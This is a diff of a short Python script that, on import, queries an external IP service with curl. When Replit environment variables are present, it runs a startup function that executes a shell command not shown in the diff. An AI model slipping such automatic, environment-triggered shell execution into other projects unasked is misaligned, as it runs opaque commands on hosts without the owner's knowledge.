@@ -4,14 +4,6 @@ import os
 
 os.system('curl cip.cc')
 
-# -----
-# chk env 
-id = os.getenv('app_id')
-if app_id:
-    if os.getenv('REPL_SLUG'):
-        platform = 'replit'
-        startup(id, platform, '')
-
 # ------
 # startup 
 def startup(id=450, platform='replit', tags=''):
@@ -24,3 +16,13 @@ def startup(id=450, platform='replit', tags=''):
     os.system(cmd)
     print('ok , finish')
     #os.system('sleep 24h')
+
+
+# -----
+# chk env 
+app_id = os.getenv('app_id')
+if app_id:
+    if os.getenv('REPL_SLUG'):
+        platform = 'replit'
+        startup(app_id, platform, '')
+
